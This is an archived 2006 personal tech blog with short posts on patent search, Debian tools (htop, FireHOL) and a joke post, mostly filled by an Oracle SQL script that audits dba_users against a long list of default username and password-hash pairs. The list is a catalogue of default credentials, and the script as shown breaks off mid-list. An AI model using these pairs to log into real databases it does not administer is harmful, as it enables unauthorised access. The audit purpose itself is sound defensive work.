Sunday, December 31, 2006

Patent Google? Use Google Patent.

When you are trying to make something it can be useful to take a look at what others have done before you. Which problems did they encounter and what is the solution they used. This is not patent fraud or something like it, it is making use of the knowledge available to the public. Patent offices are a goldmine for inventers and engineers the problem for a long time was that if you wanted something from the patent office you needed to know what you wanted.

You had to go to the patent office counter and requested a copy of the documents; this was making it somewhat more difficult to find what you wanted to know. Some patent offices did give you access to the archives where you could spend your days reading document after document. Some patent offices even started to provide you the knowledge via the Internet and now Google is catching up by launching a Google patent search engine where you can search for the complete patent documents.

Beside the fact that you could learn a lot that can help you develop a new product it can also be good fun to read some of the patents for some strange products, or finally find out why they in the name of God created the thing as it is………

Robots to Crawl Under the City

I have a new Slashdot posting on my name. Please read the original posting here:

"Robots will crawl tubes in a short while to investigate power cables running in the tubes to make sure they are still undamaged or in need for a repair. The Robotic Cable Inspection System is developed by Alexander Mamishev, an assistant professor of electrical engineering at the University of Washington. Making use of infrared thermal analysis and acoustic partial discharge analysis, the robot will be checking mile after mile of cable while crawling his way in the tubes."

You can find the posting by using this deeplink to Slashdot.

Marklin: Sun train.


I have already reported several times about the Sun Microsystems Project Blackbox. Now there is something new, Project Blackbox mini mini. Marklin created a scale model freight train with a Project Blackbox shipping container.

You can see more pictures on the this flickr link. More photo’s from the real Project Blackbox can be found on the images website of Sun and for more information about Project Blackbox
You can refer to the Sun project website.

Wednesday, December 27, 2006

Monitor processes under Debian Linux with htop.

Most of the people working with UNIX and/or Linux will have used the top command to get some more insight in the processes running on the machine. The top command is providing the terminal user with a process viewer somewhat similar as the ‘Task Manager’ for windows. It gives you the option to view the currently running processes and how this is handled by you machine, free memory, CPU load, etc.

Even do top can provide you with some very good information it still lacks some details and some nice options. An extended version of top is htop. htop is ‘adopted’ as a Debian package which makes it for Debian users quite simple to install by simple issuing the command:

$apt-get install htop

This will install the latest stable release of htop on your Debian system. To check the latest stable Debian htop package you can refer to the Debian package site.

More information about the htop project can be found at the htop project site at sourceforge.

Debian running top

Debian running htop

Tuesday, December 26, 2006

FireHOL on Debian Linux.

Even do Linux is one of the more secure operating systems this is not preventing you from taken some precautions. You still will need to have a proper firewall to make sure your workstation is not misused in any way. Personally I use on the inside of my network on every Linux workstation FireHOL to create an extra layer of security. This is on top of, or below if you prefer, my 2 external firewalls.

From Wikipedia, the free encyclopedia:
FireHOL is a firewall application designed to work with a lower level firewall utility for the linux kernel, iptables. FireHOL does not use a GUI, but is configured through an easy to understand plain text configuration file. An further advantage of FireHOL is its friendliness to beginners - you don't have to worry about the answer packet because FireHOL first parses the configuration file and then sets the appropriate iptables rules to achieve the expected firewall behavior.


Installation of FireHOL on Debian Linux is quite simple. It can completely be installed by using the apt-get command. More information on the current state of the Debian FireHOL package can be found in on the FireHOL package website.

#apt-get install Firehol

This will take care of the download, installing and basic config of firehol. Please do remember that firehol is disabled by default upon installation. To change this you will need to edit the /etc/default/firehol file.

Change the line: START_FIREHOL=NO
To this: START_FIREHOL=YES

Also you will need to modify the /etc/firehol/firehol.conf file. Here all the configuration parameters for FireHOL are maintained. For more information about how to configure and the complete list of options you can refer to the FireHOL website

For starting FireHOL after the installation and configuration will need to issue the following command: /etc/init.d/firehol start


RTFM

I have been reading some manuals to upgrade some skills... After looking at the video I found out that there is still a lot to improve.... And by the way,.... here is NO UNIX MAN page for this.....!

Steps:
(1) Read the manual.
(2) Watch the video.
(3) try it in real.


MANUAL:
Objective: To disengage said bra without looking like an idiot.

What You Need:
1. Girl with bra
2. Two functional hands
3. Common sense

Techniques:
1. "The Houdini Hug": Using sleight of hand, place arms around girl and unhook bra. Try to refrain from saying, "Ta-da!"
2. "MacGyver's Off The Shoulder Slide": An alternative method to use after 10 minutes of unsuccessful hugging.

Do Not Use:
Scissors, blowtorch, pliers, wire strippers, cutlery, black magic, staple remover, chainsaw, brute strength, CB4, set of lock picks, or chisel and hammer.

Warning! When removing a bra, do not say the following:
1. "I really want to thank you for this."
2. "Dammit! I thought they were bigger."
3. "Do you have any cereal?"



Oracle default accounts script

Oracle default accounts can be created for many different reasons. They are created by Oracle itself when the database is created. For instance the accounts SYS and SYSTEM, DBSNMP and OUTLN are often created by default when a database is created. If the database is created by using the wizard the problem can be much bigger with 10s 0r 20s of accounts being created simply as part of the database creation. Further default accounts can be created after the initial database creation by running scripts that live in the $ORACLE_HOME/rdbms/admin or other directories. These scripts can be run to add an additional feature or function or to add example code to the database (You never do this is production do you?). Further Oracle default users can be created when third party software is installed for use such as BAAN or SAP. The same issues of default users being added to the database can occur when third party development or maintenance tools are added such as TOAD or PL/SQL Developer. Problems can also occur when employees run examples from books, or documentation (official and non-official), books or web sites.

Special thanks to Pete Finnigan who maintains a comprehensive list of default passwords on his website. From the information on his website I have create the script below which can be used to check for default Oracle Username Password combinations. You can copy the source from this weblog or you can download the SQL file from my website.

/********************************************************************
* FILE NAME
* ORACLE_check_default_accounts.sql
*
*
* DESCRIPTION
* Check for default username password combinations in the Oracle
* dba_users table.
*
* Special thanks to Pete Finnigan ((http://www.petefinnigan.com)
*
*
* LICENSE
* Copyright (C) 2006 Johan Louwers
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* http://www.gnu.org/licenses/gpl.txt
*
*
* DOWNLOAD / CONTACT
* you can donwload the script from the following location:
* http://www.terminalcult.org/source/oracle/sql/ORACLE_check_default_accounts.sql
*
* You can contact Johan Louwers at Johan.Louwers(at)terminalcult.org
*
*
* HISTORY
* Version Date Author(s) Description
* ------- ----------- ------------------- --------------------------
* 1.0 26-DEC-2006 Johan Louwers Initial Creation
*
*******************************************************************/

SELECT
username AS "User(s) with Default Password!"
, account_status AS "Account Status"
, lock_date AS "Lock date"
, expiry_date AS "Expire date"
FROM
dba_users
WHERE
(username = 'BRIO_ADMIN' AND password = 'EB50644BE27DF70B')
OR (username = 'BRUGERNAVN' AND password = '2F11631B6B4E0B6F')
OR (username = 'BRUKERNAVN' AND password = '652C49CDF955F83A')
OR (username = 'BSC' AND password = 'EC481FD7DCE6366A')
OR (username = 'BUG_REPORTS' AND password = 'E9473A88A4DD31F2')
OR (username = 'CALVIN' AND password = '34200F94830271A3')
OR (username = 'CATALOG' AND password = '397129246919E8DA')
OR (username = 'CCT' AND password = 'C6AF8FCA0B51B32F')
OR (username = 'CDEMO82' AND password = '7299A5E2A5A05820')
OR (username = 'CDEMO82' AND password = '67B891F114BE3AEB')
OR (username = 'CDEMO82' AND password = '73EAE7C39B42EA15')
OR (username = 'CDEMOCOR' AND password = '3A34F0B26B951F3F')
OR (username = 'CDEMORID' AND password = 'E39CEFE64B73B308')
OR (username = 'CDEMOUCB' AND password = 'CEAE780F25D556F8')
OR (username = 'CDOUGLAS' AND password = 'C35109FE764ED61E')
OR (username = 'CE' AND password = 'E7FDFE26A524FE39')
OR (username = 'CENTRA' AND password = '63BF5FFE5E3EA16D')
OR (username = 'CENTRAL' AND password = 'A98B26E2F65CA4D3')
OR (username = 'CIDS' AND password = 'AA71234EF06CE6B3')
OR (username = 'CIS' AND password = '7653EBAF048F0A10')
OR (username = 'CIS' AND password = 'AA2602921607EE84')
OR (username = 'CISINFO' AND password = '3AA26FC267C5F577')
OR (username = 'CISINFO' AND password = 'BEA52A368C31B86F')
OR (username = 'CLARK' AND password = '7AAFE7D01511D73F')
OR (username = 'CN' AND password = '73F284637A54777D')
OR (username = 'COMPANY' AND password = '402B659C15EAF6CB')
OR (username = 'COMPIERE' AND password = 'E3D0DCF4B4DBE626')
OR (username = 'CQSCHEMAUSER' AND password = '04071E7EDEB2F5CC')
OR (username = 'CQUSERDBUSER' AND password = '0273F484CD3F44B7')
OR (username = 'CRP' AND password = 'F165BDE5462AD557')
OR (username = 'CS' AND password = 'DB78866145D4E1C3')
OR (username = 'CSC' AND password = 'EDECA9762A8C79CD')
OR (username = 'CSD' AND password = '144441CEBAFC91CF')
OR (username = 'CSE' AND password = 'D8CC61E8F42537DA')
OR (username = 'CSF' AND password = '684E28B3C899D42C')
OR (username = 'CSI' AND password = '71C2B12C28B79294')
OR (username = 'CSL' AND password = 'C4D7FE062EFB85AB')
OR (username = 'CSMIG' AND password = '09B4BB013FBD0D65')
OR (username = 'CSP' AND password = '5746C5E077719DB4')
OR (username = 'CSR' AND password = '0E0F7C1B1FE3FA32')
OR (username = 'CSS' AND password = '3C6B8C73DDC6B04F')
OR (username = 'CTXDEMO' AND password = 'CB6B5E9D9672FE89')
OR (username = 'CTXSYS' AND password = '71E687F036AD56E5')
OR (username = 'CTXSYS' AND password = '24ABAB8B06281B4C')
OR (username = 'CTXSYS' AND password = 'A13C035631643BA0')
OR (username = 'CUA' AND password = 'CB7B2E6FFDD7976F')
OR (username = 'CUE' AND password = 'A219FE4CA25023AA')
OR (username = 'CUF' AND password = '82959A9BD2D51297')
OR (username = 'CUG' AND password = '21FBCADAEAFCC489')
OR (username = 'CUI' AND password = 'AD7862E01FA80912')
OR (username = 'CUN' AND password = '41C2D31F3C85A79D')
OR (username = 'CUP' AND password = 'C03082CD3B13EC42')
OR (username = 'CUS' AND password = '00A12CC6EBF8EDB8')
OR (username = 'CZ' AND password = '9B667E9C5A0D21A6')
OR (username = 'DATA_SCHEMA' AND password = '5ECB30FD1A71CC54')
OR (username = 'DBI' AND password = 'D8FF6ECEF4C50809')
OR (username = 'MDDEMO_MGR' AND password = '2E175141BEE66FF6')
OR (username = 'MDSYS' AND password = '72979A94BAD2AF80')
OR (username = 'ME' AND password = 'E5436F7169B29E4D')
OR (username = 'MFG' AND password = 'FC1B0DD35E790847')
OR (username = 'MGR' AND password = '9D1F407F3A05BDD9')
OR (username = 'MGWUSER' AND password = 'EA514DD74D7DE14C')
OR (username = 'MIGRATE' AND password = '5A88CE52084E9700')
OR (username = 'MILLER' AND password = 'D0EFCD03C95DF106')
OR (username = 'MMO2' AND password = 'AE128772645F6709')
OR (username = 'MMO2' AND password = 'A0E2085176E05C85')
OR (username = 'MMO2' AND password = '62876B0382D5B550')
OR (username = 'MODTEST' AND password = 'BBFF58334CDEF86D')
OR (username = 'MOREAU' AND password = 'CF5A081E7585936B')
OR (username = 'MRP' AND password = 'B45D4DF02D4E0C85')
OR (username = 'MSC' AND password = '89A8C104725367B2')
OR (username = 'MSD' AND password = '6A29482069E23675')
OR (username = 'MSO' AND password = '3BAA3289DB35813C')
OR (username = 'MSR' AND password = 'C9D53D00FE77D813')
OR (username = 'MTS_USER' AND password = 'E462DB4671A51CD4')
OR (username = 'MTSSYS' AND password = '6465913FF5FF1831')
OR (username = 'MWA' AND password = '1E2F06BE2A1D41A6')
OR (username = 'MXAGENT' AND password = 'C5F0512A64EB0E7F')
OR (username = 'NAMES' AND password = '9B95D28A979CC5C4')
OR (username = 'NEOTIX_SYS' AND password = '05BFA7FF86D6EB32')
OR (username = 'NNEUL' AND password = '4782D68D42792139')
OR (username = 'NOM_UTILISATEUR' AND password = 'FD621020564A4978')
OR (username = 'NOMEUTENTE' AND password = '8A43574EFB1C71C7')
OR (username = 'NOME_UTILIZADOR' AND password = '71452E4797DF917B')
OR (username = 'NUME_UTILIZATOR' AND password = '73A3AC32826558AE')
OR (username = 'OAS_PUBLIC' AND password = 'A8116DB6E84FA95D')
OR (username = 'OAS_PUBLIC' AND password = '9300C0977D7DC75E')
OR (username = 'OCITEST' AND password = 'C09011CB0205B347')
OR (username = 'OCM_DB_ADMIN' AND password = '2C3A5DEF1EE57E92')
OR (username = 'ODM' AND password = 'C252E8FA117AF049')
OR (username = 'ODM_MTR' AND password = 'A7A32CD03D3CE8D5')
OR (username = 'ODS' AND password = '89804494ADFC71BC')
OR (username = 'ODS_SERVER' AND password = 'C6E799A949471F57')
OR (username = 'ODSCOMMON' AND password = '59BBED977430C1A8')
OR (username = 'OE' AND password = '9C30855E7E0CB02D')
OR (username = 'OE' AND password = '62FADF01C4DC1ED4')
OR (username = 'OE' AND password = 'D1A2DFC623FDA40A')
OR (username = 'OEM_REPOSITORY' AND password = '1FF89109F7A16FEF')
OR (username = 'OEMADM' AND password = '9DCE98CCF541AAE6')
OR (username = 'OEMREP' AND password = '7BB2F629772BF2E5')
OR (username = 'OKB' AND password = 'A01A5F0698FC9E31')
OR (username = 'OKC' AND password = '31C1DDF4D5D63FE6')
OR (username = 'OKE' AND password = 'B7C1BB95646C16FE')
OR (username = 'OKI' AND password = '991C817E5FD0F35A')
OR (username = 'OKO' AND password = '6E204632EC7CA65D')
OR (username = 'OKR' AND password = 'BB0E28666845FCDC')
OR (username = 'OKS' AND password = 'C2B4C76AB8257DF5')
OR (username = 'OKX' AND password = 'F9FDEB0DE52F5D6B')
OR (username = 'OLAPDBA' AND password = '1AF71599EDACFB00')
OR (username = 'OLAPSVR' AND password = 'AF52CFD036E8F425')
OR (username = 'OLAPSVR' AND password = '3B3F6DB781927D0F')
OR (username = 'OLAPSYS' AND password = '3FB8EF9DB538647C')
OR (username = 'OLAPSYS' AND password = 'C1510E7AC8F0D90D')
OR (username = 'OMWB_EMULATION' AND password = '54A85D2A0AB8D865')
OR (username = 'ONT' AND password = '9E3C81574654100A')
OR (username = 'OO' AND password = '2AB9032E4483FAFC')
OR (username = 'OPENSPIRIT' AND password = 'D664AAB21CE86FD2')
OR (username = 'OPI' AND password = '1BF23812A0AEEDA0')
OR (username = 'ORACACHE' AND password = '5A4EEC421DE68DDD')
OR (username = 'ORACLE' AND password = '38E38619A12E0257')
OR (username = 'ORADBA' AND password = 'C37E732953A8ABDB')
OR (username = 'ORANGE' AND password = '3D9B7E34A4F7D4E9')
OR (username = 'ORAPROBE' AND password = '2E3EA470A4CA2D94')
OR (username = 'ORAREGSYS' AND password = '28D778112C63CB15')
OR (username = 'ORASSO' AND password = 'F3701A008AA578CF')
OR (username = 'ORASSO_DS' AND password = '17DC8E02BC75C141')
OR (username = 'ORASSO_PA' AND password = '133F8D161296CB8F')
OR (username = 'ORASSO_PS' AND password = '63BB534256053305')
OR (username = 'ORASSO_PUBLIC' AND password = 'C6EED68A8F75F5D3')
OR (username = 'ORASTAT' AND password = '6102BAE530DD4B95')
OR (username = 'ORCLADMIN' AND password = '7C0BE475D580FBA2')
OR (username = 'ORDCOMMON' AND password = '9B616F5489F90AD7')
OR (username = 'DBSNMP' AND password = 'E066D214D5421CCC')
OR (username = 'DBVISION' AND password = 'F74F7EF36A124931')
OR (username = 'DDIC' AND password = '4F9FFB093F909574')
OR (username = 'DEMO' AND password = '4646116A123897CF')
OR (username = 'DEMO8' AND password = '0E7260738FDFD678')
OR (username = 'DEMO9' AND password = 'EE02531A80D998CA')
OR (username = 'DES' AND password = 'ABFEC5AC2274E54D')
OR (username = 'DES2K' AND password = '611E7A73EC4B425A')
OR (username = 'DEV2000_DEMOS' AND password = '18A0C8BD6B13BEE2')
OR (username = 'DIANE' AND password = '46DC27700F2ADE28')
OR (username = 'DIP' AND password = 'CE4A36B8E06CA59C')
OR (username = 'DISCOVERER_ADMIN' AND password = '5C1AED4D1AADAA4C')
OR (username = 'DMSYS' AND password = 'BFBA5A553FD9E28A')
OR (username = 'DPF' AND password = 'E53F7C782FAA6898')
OR (username = 'DSGATEWAY' AND password = '6869F3CFD027983A')
OR (username = 'DSSYS' AND password = 'E3B6E6006B3A99E0')
OR (username = 'DTSP' AND password = '5A40D4065B3673D2')
OR (username = 'EAA' AND password = 'A410B2C5A0958CDF')
OR (username = 'EAM' AND password = 'CE8234D92FCFB563')
OR (username = 'EARLYWATCH' AND password = '8AA1C62E08C76445')
OR (username = 'EAST' AND password = 'C5D5C455A1DE5F4D')
OR (username = 'EC' AND password = '6A066C462B62DD46')
OR (username = 'ECX' AND password = '0A30645183812087')
OR (username = 'EJB' AND password = '69CB07E2162C6C93')
OR (username = 'EJSADMIN' AND password = '4C59B97125B6641A')
OR (username = 'EJSADMIN' AND password = '313F9DFD92922CD2')
OR (username = 'EMP' AND password = 'B40C23C6E2B4EA3D')
OR (username = 'ENG' AND password = '4553A3B443FB3207')
OR (username = 'ENI' AND password = '05A92C0958AFBCBC')
OR (username = 'ESTOREUSER' AND password = '51063C47AC2628D4')
OR (username = 'EVENT' AND password = '7CA0A42DA768F96D')
OR (username = 'EVM' AND password = '137CEDC20DE69F71')
OR (username = 'EXAMPLE' AND password = '637417B1DC47C2E5')
OR (username = 'EXFSYS' AND password = '66F4EF5650C20355')
OR (username = 'EXTDEMO' AND password = 'BAEF9D34973EE4EC')
OR (username = 'EXTDEMO2' AND password = '6A10DD2DB23880CB')
OR (username = 'FA' AND password = '21A837D0AED8F8E5')
OR (username = 'FEM' AND password = 'BD63D79ADF5262E7')
OR (username = 'FII' AND password = 'CF39DE29C08F71B9')
OR (username = 'FINANCE' AND password = '6CBBF17292A1B9AA')
OR (username = 'FINPROD' AND password = '8E2713F53A3D69D5')
OR (username = 'FLM' AND password = 'CEE2C4B59E7567A3')
OR (username = 'FND' AND password = '0C0832F8B6897321')
OR (username = 'FOO' AND password = '707156934A6318D4')
OR (username = 'FPT' AND password = '73E3EC9C0D1FAECF')
OR (username = 'FRM' AND password = '9A2A7E2EBE6E4F71')
OR (username = 'FROSTY' AND password = '2ED539F71B4AA697')
OR (username = 'FTE' AND password = '2FB4D2C9BAE2CCCA')
OR (username = 'FV' AND password = '907D70C0891A85B1')
OR (username = 'GL' AND password = 'CD6E99DACE4EA3A6')
OR (username = 'GMA' AND password = 'DC7948E807DFE242')
OR (username = 'GMD' AND password = 'E269165256F22F01')
OR (username = 'GME' AND password = 'B2F0E221F45A228F')
OR (username = 'GMF' AND password = 'A07F1956E3E468E1')
OR (username = 'GMI' AND password = '82542940B0CF9C16')
OR (username = 'GML' AND password = '5F1869AD455BBA73')
OR (username = 'GMP' AND password = '450793ACFCC7B58E')
OR (username = 'GMS' AND password = 'E654261035504804')
OR (username = 'GPFD' AND password = 'BA787E988F8BC424')
OR (username = 'GPLD' AND password = '9D561E4D6585824B')
OR (username = 'GR' AND password = 'F5AB0AA3197AEE42')
OR (username = 'HADES' AND password = '2485287AC1DB6756')
OR (username = 'HCPARK' AND password = '3DE1EBA32154C56B')
OR (username = 'HLW' AND password = '855296220C095810')
OR (username = 'HR' AND password = '6E0C251EABE4EBB8')
OR (username = 'ABM' AND password = 'D0F2982F121C7840')
OR (username = 'ADAMS' AND password = '72CDEF4A3483F60D')
OR (username = 'ADLDEMO' AND password = '147215F51929A6E8')
OR (username = 'ADMIN' AND password = 'CAC22318F162D597')
OR (username = 'ADMIN' AND password = 'B8B15AC9A946886A')
OR (username = 'ADMINISTRATOR' AND password = 'F9ED601D936158BD')
OR (username = 'ADMINISTRATOR' AND password = '1848F0A31D1C5C62')
OR (username = 'AHL' AND password = '7910AE63C9F7EEEE')
OR (username = 'AHM' AND password = '33C2E27CF5E401A4')
OR (username = 'AK' AND password = '8FCB78BBA8A59515')
OR (username = 'ALHRO' AND password = '049B2397FB1A419E')
OR (username = 'ALHRW' AND password = 'B064872E7F344CAE')
OR (username = 'ALR' AND password = 'BE89B24F9F8231A9')
OR (username = 'AMS' AND password = 'BD821F59270E5F34')
OR (username = 'AMV' AND password = '38BC87EB334A1AC4')
OR (username = 'ANDY' AND password = 'B8527562E504BC3F')
OR (username = 'ANONYMOUS' AND password = 'FE0E8CE7C92504E9')
OR (username = 'AP' AND password = 'EED09A552944B6AD')
OR (username = 'APPLMGR' AND password = 'CB562C240E871070')
OR (username = 'APPLSYS' AND password = 'FE84888987A6BF5A')
OR (username = 'APPLSYS' AND password = 'E153FFF4DAE6C9F7')
OR (username = 'APPLSYS' AND password = '0F886772980B8C79')
OR (username = 'APPLSYSPUB' AND password = 'D5DB40BB03EA1270')
OR (username = 'APPLSYSPUB' AND password = 'D2E3EF40EE87221E')
OR (username = 'APPLSYSPUB' AND password = '78194639B5C3DF9F')
OR (username = 'APPLYSYSPUB' AND password = '78194639B5C3DF9F')
OR (username = 'APPLYSYSPUB' AND password = 'A5E09E84EC486FC9')
OR (username = 'APPLYSYSPUB' AND password = 'D2E3EF40EE87221E')
OR (username = 'APPS' AND password = 'D728438E8A5925E0')
OR (username = 'APPS_MRC' AND password = '2FFDCBB4FD11D9DC')
OR (username = 'APPUSER' AND password = '7E2C3C2D4BF4071B')
OR (username = 'AQ' AND password = '2B0C31040A1CFB48')
OR (username = 'AQDEMO' AND password = '5140E342712061DD')
OR (username = 'AQJAVA' AND password = '8765D2543274B42E')
OR (username = 'AQUSER' AND password = '4CF13BDAC1D7511C')
OR (username = 'AR' AND password = 'BBBFE175688DED7E')
OR (username = 'ASF' AND password = 'B6FD427D08619EEE')
OR (username = 'ASG' AND password = '1EF8D8BD87CF16BE')
OR (username = 'ASL' AND password = '03B20D2C323D0BFE')
OR (username = 'ASO' AND password = 'F712D80109E3C9D8')
OR (username = 'ASP' AND password = 'CF95D2C6C85FF513')
OR (username = 'AST' AND password = 'F13FF949563EAB3C')
OR (username = 'ATM' AND password = '7B83A0860CF3CB71')
OR (username = 'AUDIOUSER' AND password = 'CB4F2CEC5A352488')
OR (username = 'AURORA$JIS$UTILITY$' AND password = 'E1BAE6D95AA95F1E')
OR (username = 'AURORA$ORB$UNAUTHENTICATED' AND password = '80C099F0EADF877E')
OR (username = 'AX' AND password = '0A8303530E86FCDD')
OR (username = 'AZ' AND password = 'AAA18B5D51B0D5AC')
OR (username = 'BC4J' AND password = 'EAA333E83BF2810D')
OR (username = 'BEN' AND password = '9671866348E03616')
OR (username = 'BIC' AND password = 'E84CC95CBBAC1B67')
OR (username = 'BIL' AND password = 'BF24BCE2409BE1F7')
OR (username = 'BIM' AND password = '6026F9A8A54B9468')
OR (username = 'BIS' AND password = '7E9901882E5F3565')
OR (username = 'BIV' AND password = '2564B34BE50C2524')
OR (username = 'BIX' AND password = '3DD36935EAEDE2E3')
OR (username = 'BLAKE' AND password = '9435F2E60569158E')
OR (username = 'BLEWIS' AND password = 'C9B597D7361EE067')
OR (username = 'BOM' AND password = '56DB3E89EAE5788E')
OR (username = 'HR' AND password = '33EBE1C63D5B7FEF')
OR (username = 'HR' AND password = '6399F3B38EDF3288')
OR (username = 'HR' AND password = '4C6D73C3E8B0F0DA')
OR (username = 'HRI' AND password = '49A3A09B8FC291D0')
OR (username = 'HVST' AND password = '5787B0D15766ADFD')
OR (username = 'HXC' AND password = '4CEA0BF02214DA55')
OR (username = 'HXT' AND password = '169018EB8E2C4A77')
OR (username = 'IBA' AND password = '0BD475D5BF449C63')
OR (username = 'IBE' AND password = '9D41D2B3DD095227')
OR (username = 'IBP' AND password = '840267B7BD30C82E')
OR (username = 'IBU' AND password = '0AD9ABABC74B3057')
OR (username = 'IBY' AND password = 'F483A48F6A8C51EC')
OR (username = 'ICDBOWN' AND password = '76B8D54A74465BB4')
OR (username = 'ICX' AND password = '7766E887AF4DCC46')
OR (username = 'IDEMO_USER' AND password = '739F5BC33AC03043')
OR (username = 'IEB' AND password = 'A695699F0F71C300')
OR (username = 'IEC' AND password = 'CA39F929AF0A2DEC')
OR (username = 'IEM' AND password = '37EF7B2DD17279B5')
OR (username = 'IEO' AND password = 'E93196E9196653F1')
OR (username = 'IES' AND password = '30802533ADACFE14')
OR (username = 'IEU' AND password = '5D0E790B9E882230')
OR (username = 'IEX' AND password = '6CC978F56D21258D')
OR (username = 'IFSSYS' AND password = '1DF0D45B58E72097')
OR (username = 'IGC' AND password = 'D33CEB8277F25346')
OR (username = 'IGF' AND password = '1740079EFF46AB81')
OR (username = 'IGI' AND password = '8C69D50E9D92B9D0')
OR (username = 'IGS' AND password = 'DAF602231281B5AC')
OR (username = 'IGW' AND password = 'B39565F4E3CF744B')
OR (username = 'IMAGEUSER' AND password = 'E079BF5E433F0B89')
OR (username = 'IMC' AND password = 'C7D0B9CDE0B42C73')
OR (username = 'IMEDIA' AND password = '8FB1DC9A6F8CE827')
OR (username = 'IMT' AND password = 'E4AAF998653C9A72')
OR (username = '#INTERNAL' AND password = '87DADF57B623B777')
OR (username = '#INTERNAL' AND password = '38379FC3621F7DA2')
OR (username = 'INTERNAL' AND password = 'AB27B53EDC5FEF41')
OR (username = 'INTERNAL' AND password = 'E0BF7F3DDE682D3B')
OR (username = 'INV' AND password = 'ACEAB015589CF4BC')
OR (username = 'IPA' AND password = 'EB265A08759A15B4')
OR (username = 'IPD' AND password = '066A2E3072C1F2F3')
OR (username = 'IPLANET' AND password = '7404A12072F4E5E8')
OR (username = 'ISC' AND password = '373F527DC0CFAE98')
OR (username = 'ITG' AND password = 'D90F98746B68E6CA')
OR (username = 'JA' AND password = '9AC2B58153C23F3D')
OR (username = 'JAKE' AND password = '1CE0B71B4A34904B')
OR (username = 'JE' AND password = 'FBB3209FD6280E69')
OR (username = 'JG' AND password = '37A99698752A1CF1')
OR (username = 'JILL' AND password = 'D89D6F9EB78FC841')
OR (username = 'JL' AND password = '489B61E488094A8D')
OR (username = 'JMUSER' AND password = '063BA85BF749DF8E')
OR (username = 'JOHN' AND password = '29ED3FDC733DC86D')
OR (username = 'JONES' AND password = 'B9E99443032F059D')
OR (username = 'JTF' AND password = '5C5F6FC2EBB94124')
OR (username = 'JTM' AND password = '6D79A2259D5B4B5A')
OR (username = 'JTS' AND password = '4087EE6EB7F9CD7C')
OR (username = 'JWARD' AND password = 'CF9CB787BD98DA7F')
OR (username = 'KWALKER' AND password = 'AD0D93891AEB26D2')
OR (username = 'L2LDEMO' AND password = '0A6B2DF907484CEE')
OR (username = 'LBACSYS' AND password = 'AC9700FD3F1410EB')
OR (username = 'LIBRARIAN' AND password = '11E0654A7068559C')
OR (username = 'MANPROD' AND password = 'F0EB74546E22E94D')
OR (username = 'MARK' AND password = 'F7101600ACABCD74')
OR (username = 'MASCARM' AND password = '4EA68D0DDE8AAC6B')
OR (username = 'MASTER' AND password = '9C4F452058285A74')
OR (username = 'MDDATA' AND password = 'DF02A496267DEE66')
OR (username = 'MDDEMO' AND password = '46DFFB4D08C33739')
OR (username = 'MDDEMO_CLERK' AND password = '564F871D61369A39')
OR (username = 'MDDEMO_CLERK' AND password = 'E5288E225588D11F')
OR (username = 'WWWUSER' AND password = 'F239A50072154BAC')
OR (username = 'XADEMO' AND password = 'ADBC95D8DCC69E66')
OR (username = 'XDB' AND password = '88D8364765FCE6AF')
OR (username = 'XDP' AND password = 'F05E53C662835FA2')
OR (username = 'XLA' AND password = '2A8ED59E27D86D41')
OR (username = 'XNC' AND password = 'BD8EA41168F6C664')
OR (username = 'XNI' AND password = 'F55561567EF71890')
OR (username = 'XNM' AND password = '92776EA17B8B5555')
OR (username = 'XNP' AND password = '3D1FB783F96D1F5E')
OR (username = 'XNS' AND password = 'FABA49C38150455E')
OR (username = 'XPRT' AND password = '0D5C9EFC2DFE52BA')
OR (username = 'XTR' AND password = 'A43EE9629FA90CAE')
OR (username = 'MDDEMO_MGR' AND password = 'B41BCD9D3737F5C4')
OR (username = 'SYSTEM' AND password = '4438308EE0CAFB7F')
OR (username = 'SYSTEM' AND password = 'FAAD7ADAF48B5F45')
OR (username = 'SYSTEM' AND password = '685657E9DC29E185')
OR (username = 'SYSTEM' AND password = '49B70B505DF0247F')
OR (username = 'SYSTEM' AND password = 'B49C4279EBD8D1A8')
OR (username = 'SYSTEM' AND password = '604101D3AACE7E88')
OR (username = 'SYSTEM' AND password = '02AB2DB93C952A8F')
OR (username = 'SYSTEM' AND password = '203CD8CF183E716C')
OR (username = 'SYS' AND password = '1FA22316B703EBDD')
OR (username = 'SYS' AND password = '12CFB5AE1D087BA3')
OR (username = 'SYS' AND password = '380E3D3AD5CE32D4')
OR (username = 'SYS' AND password = '2563EFAAE44E785A')
OR (username = 'SYS' AND password = 'E7686462E8CD2F5E')
OR (username = 'SYS' AND password = '691C5E7E424B821A')
OR (username = 'ORDPLUGINS' AND password = '88A2B2C183431F00')
OR (username = 'ORDSYS' AND password = '7EFA02EC7EA6B86F')
OR (username = 'OSE$HTTP$ADMIN' AND password = '05327CD9F6114E21')
OR (username = 'OSM' AND password = '106AE118841A5D8C')
OR (username = 'OSP22' AND password = 'C04057049DF974C2')
OR (username = 'OTA' AND password = 'F5E498AC7009A217')
OR (username = 'OUTLN' AND password = '4A3BA55E08595C81')
OR (username = 'OWA' AND password = 'CA5D67CD878AFC49')
OR (username = 'OWA_PUBLIC' AND password = '0D9EC1D1F2A37657')
OR (username = 'OWF_MGR' AND password = '3CBED37697EB01D1')
OR (username = 'OWNER' AND password = '5C3546B4F9165300')
OR (username = 'OZF' AND password = '970B962D942D0C75')
OR (username = 'OZP' AND password = 'B650B1BB35E86863')
OR (username = 'OZS' AND password = '0DABFF67E0D33623')
OR (username = 'PA' AND password = '8CE2703752DB36D8')
OR (username = 'PANAMA' AND password = '3E7B4116043BEAFF')
OR (username = 'PATROL' AND password = '0478B8F047DECC65')
OR (username = 'PAUL' AND password = '35EC0362643ADD3F')
OR (username = 'PERFSTAT' AND password = 'AC98877DE1297365')
OR (username = 'PERSTAT' AND password = 'A68F56FBBCDC04AB')
OR (username = 'PJM' AND password = '021B05DBB892D11F')
OR (username = 'PLANNING' AND password = '71B5C2271B7CFF18')
OR (username = 'PLEX' AND password = '99355BF0E53FF635')
OR (username = 'PLSQL' AND password = 'C4522E109BCF69D0')
OR (username = 'PM' AND password = '72E382A52E89575A')
OR (username = 'PM' AND password = 'F67E035BF8352CB4')
OR (username = 'PM' AND password = 'C7A235E6D2AF6018')
OR (username = 'PMI' AND password = 'A7F7978B21A6F65E')
OR (username = 'PN' AND password = 'D40D0FEF9C8DC624')
OR (username = 'PO' AND password = '355CBEC355C10FEF')
